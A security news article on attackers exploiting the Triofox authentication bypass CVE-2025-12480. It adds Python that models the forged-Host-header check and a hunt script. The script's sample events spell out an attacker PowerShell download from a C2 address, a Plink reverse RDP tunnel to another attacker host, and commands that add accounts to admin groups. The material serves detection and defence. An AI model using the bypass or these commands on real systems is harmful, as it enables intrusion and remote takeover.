Security Affairs

Critical Triofox bug exploited to run malicious payloads via AV configuration

Hackers exploited Triofox flaw CVE-2025-12480 to bypass auth and install remote access tools via the platform’s antivirus feature.

Google’s Mandiant researchers spotted threat actors exploiting a now-patched Triofox flaw, tracked as CVE-2025-12480 (CVSS score of 9.1), that allows them to bypass authentication and upload and run remote access tools via the platform’s antivirus feature.

Mandiant attributes the ongoing exploitation of the Triofox flaw CVE-2025-12480 to the threat cluster UNC6485.

“As early as Aug. 24, 2025, a threat cluster tracked by Google Threat Intelligence Group (GTIG) as UNC6485 exploited the unauthenticated access vulnerability and chained it with the abuse of the built-in anti-virus feature to achieve code execution.” reads the report published by Mandiant.

Mandiant leveraged Google Security Operations to detect suspicious activity on a customer’s Triofox server involving PLINK-based RDP tunneling and file downloads to temp directories.

It’s the third Triofox bug abused this year, following CVE-2025-30406 and CVE-2025-11371. The patched version blocks access to the configuration pages once initial setup is complete; before the fix, attackers used the unauthenticated access to re-enter the setup process and create a new admin account, “Cluster Admin,” which they then used for further malicious activity across compromised systems.

Mandiant found a suspicious HTTP request in which an external source supplied a Host header of “localhost,” a sign of exploitation. Testing showed that Triofox pages such as AdminAccount.aspx and AdminDatabase.aspx should redirect to “Access Denied,” but setting the Host header to “localhost” bypassed these controls, granting access to the admin setup process and allowing new admin accounts to be created. Analysis traced the behavior to the CanRunCriticalPage() function in GladPageUILib.dll, which grants access whenever the Host header equals “localhost.” Because the Host header is supplied by the client, an attacker can forge it; the check has no way to verify where a request really originates and relies only on settings that are easily misconfigured.
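As an added illustration (not Triofox code and not from the Mandiant report), the following Python models the trust decision described above: a check that grants the setup pages whenever the client-supplied Host header reads localhost, beside a version that decides from the connection’s peer address and from whether setup has already completed. The page names come from the article; the function and argument names, the tiny router, and the sample requests are assumptions made for this example.

```python
"""Host-header trust flaw, modelled for illustration (not Triofox's actual code)."""
import ipaddress

# Pages the report names as reachable only during initial setup
CRITICAL_PAGES = {"/AdminAccount.aspx", "/AdminDatabase.aspx"}
LOOPBACK = (ipaddress.ip_network("127.0.0.0/8"), ipaddress.ip_network("::1/128"))


def _host_name(headers):
    """Return the Host header without any :port suffix, lower-cased."""
    host = headers.get("Host", "")
    if host.startswith("["):              # "[::1]:8080" style IPv6 literal
        return host.split("]")[0][1:].lower()
    return host.split(":")[0].lower()


def can_run_critical_page_vulnerable(headers):
    """Mirrors the decision the report attributes to CanRunCriticalPage():
    trust the request whenever the client-supplied Host header says localhost.
    Nothing here looks at where the TCP connection actually came from."""
    return _host_name(headers) == "localhost"


def can_run_critical_page_hardened(peer_ip, setup_complete):
    """Decide from the transport-level peer address, which the client cannot
    forge, and from whether initial setup has already finished (assumed API)."""
    if setup_complete:
        return False                      # setup pages are never re-exposed
    addr = ipaddress.ip_address(peer_ip)
    return any(addr in net for net in LOOPBACK)


def handle(path, peer_ip, headers, setup_complete, hardened):
    """Minimal router: return the status a client would observe."""
    if path not in CRITICAL_PAGES:
        return "200 OK"
    if hardened:
        allowed = can_run_critical_page_hardened(peer_ip, setup_complete)
    else:
        allowed = can_run_critical_page_vulnerable(headers)
    return "200 OK (setup page)" if allowed else "302 -> AccessDenied"


if __name__ == "__main__":
    # Constructed request: external client, forged Host header, setup long done.
    spoofed = {"Host": "localhost"}
    print("vulnerable:", handle("/AdminAccount.aspx", "203.0.113.7", spoofed, True, hardened=False))
    print("hardened:  ", handle("/AdminAccount.aspx", "203.0.113.7", spoofed, True, hardened=True))
```

The vulnerable branch reproduces the bypass: an external address with `Host: localhost` reaches the setup page, which is exactly the request shape Mandiant found in the logs. The hardened branch never consults the header at all, and additionally refuses the critical pages once setup is complete, so even a genuine loopback caller cannot re-run account creation later.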

The attacker used the newly created admin account to upload and run a malicious batch script via Triofox’s antivirus feature: they pointed the configured antivirus engine path at their script, which the platform then executed with SYSTEM privileges. Uploading any file to a published share triggered the script. The batch file ran a PowerShell downloader that fetched a disguised payload from http://84.200.80[.]252 (saved as C:\Windows\appcompat\SAgentInstaller_16.7.10368.56560.exe) and launched it silently. The payload installed Zoho UEMS, which the attacker abused to deploy Zoho Assist and AnyDesk for remote access. Using Zoho Assist, the attackers enumerated SMB sessions and user accounts, then attempted password changes and privilege escalation (adding accounts to the local Administrators group and to Domain Admins). For persistence and C2 tunneling they downloaded Plink-like tools (sihosts.exe, silcon.exe) into C:\Windows\Temp and established an SSH reverse tunnel over port 433 to 216.107.136[.]46, forwarding the victim’s RDP service (127.0.0.1:3389) to the attacker-controlled host.
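The indicators in the chain above (the download staged under C:\Windows\appcompat, the Plink-like tools in C:\Windows\Temp, the reverse tunnel to port 3389, the group additions, and the two de-fanged IP addresses) are enough for a first-pass hunt over process-creation telemetry. The Python below is an added example, not one of Mandiant’s hunting queries; the process events it runs over are constructed for this example, and the rule names and the (image path, command line) tuple format are assumptions.

```python
"""First-pass hunt for the post-exploitation chain described above (added example)."""
import re

# Indicators taken from the article (re-fanged); not an exhaustive list.
C2_HOSTS = {"84.200.80.252", "216.107.136.46"}
TUNNEL_TOOLS = {"sihosts.exe", "silcon.exe"}

RE_DOWNLOAD = re.compile(r"downloadfile|downloadstring|invoke-webrequest|iwr\b|wget\b|curl\b", re.I)
RE_REVERSE_TUNNEL = re.compile(r"-R\s+\S*:3389")          # plink/ssh remote forward to RDP
RE_GROUP_ADD = re.compile(r'(localgroup\s+administrators|group\s+"?domain admins"?).*\s/add\b', re.I)


def _image_name(image):
    """Basename of the process image, lower-cased, tolerant of either slash."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def hunt(events):
    """Return [(rule, image, cmdline)] for every event that matches a rule.

    events: iterable of (image_path, command_line) tuples (constructed format)."""
    hits = []
    for image, cmdline in events:
        name = _image_name(image)
        low = cmdline.lower()
        # 1. PowerShell fetching something into the appcompat staging directory
        if name in ("powershell.exe", "pwsh.exe") and RE_DOWNLOAD.search(cmdline) \
                and "\\windows\\appcompat\\" in low:
            hits.append(("powershell_download_to_appcompat", image, cmdline))
        # 2. Known tool names, or any binary in C:\Windows\Temp opening a remote forward to 3389
        if name in TUNNEL_TOOLS or (
                image.lower().startswith("c:\\windows\\temp\\") and RE_REVERSE_TUNNEL.search(cmdline)):
            hits.append(("plink_style_rdp_tunnel", image, cmdline))
        # 3. Local Administrators / Domain Admins membership changes via net.exe
        if name in ("net.exe", "net1.exe") and RE_GROUP_ADD.search(cmdline):
            hits.append(("admin_group_add", image, cmdline))
        # 4. Any command line referencing a reported C2 address
        if any(host in cmdline for host in C2_HOSTS):
            hits.append(("known_c2_address", image, cmdline))
    return hits


# Constructed events modelled on the reported chain, plus two benign ones.
EVENTS = [
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"powershell.exe -w hidden -c (New-Object Net.WebClient).DownloadFile('http://84.200.80.252/SAgent','C:\Windows\appcompat\SAgentInstaller_16.7.10368.56560.exe')"),
    (r"C:\Windows\Temp\sihosts.exe",
     r"C:\Windows\Temp\sihosts.exe -ssh -P 433 -R 3389:127.0.0.1:3389 tunnel@216.107.136.46"),
    (r"C:\Windows\System32\net.exe", r'net group "Domain Admins" svc_backup /add /domain'),
    (r"C:\Windows\System32\net.exe", r"net localgroup administrators triofoxsvc /add"),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"powershell.exe -c Get-ChildItem C:\Shares"),
    (r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs"),
]

if __name__ == "__main__":
    for rule, image, cmdline in hunt(EVENTS):
        print(f"[{rule}] {image}\n    {cmdline}")
```

Rule 2 deliberately does not depend on the file names alone: a renamed copy of Plink launched from C:\Windows\Temp with a remote forward to port 3389 still fires, which matters because the tool names here are specific to one intrusion. Pair this with the report’s own advice to watch for anomalous outbound SSH, since a tunnel on port 433 to an unfamiliar host will not be caught by process telemetry alone.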

“While this vulnerability is patched in the Triofox version 16.7.10368.56560, Mandiant recommends upgrading to the latest release. In addition, Mandiant recommends auditing admin accounts, and verifying that Triofox’s Anti-virus Engine is not configured to execute unauthorized scripts or binaries.” concludes the report. “Security teams should also hunt for attacker tools using our hunting queries listed at the bottom of this post, and monitor for anomalous outbound SSH traffic.”

Pierluigi Paganini

(SecurityAffairs – hacking, Triofox)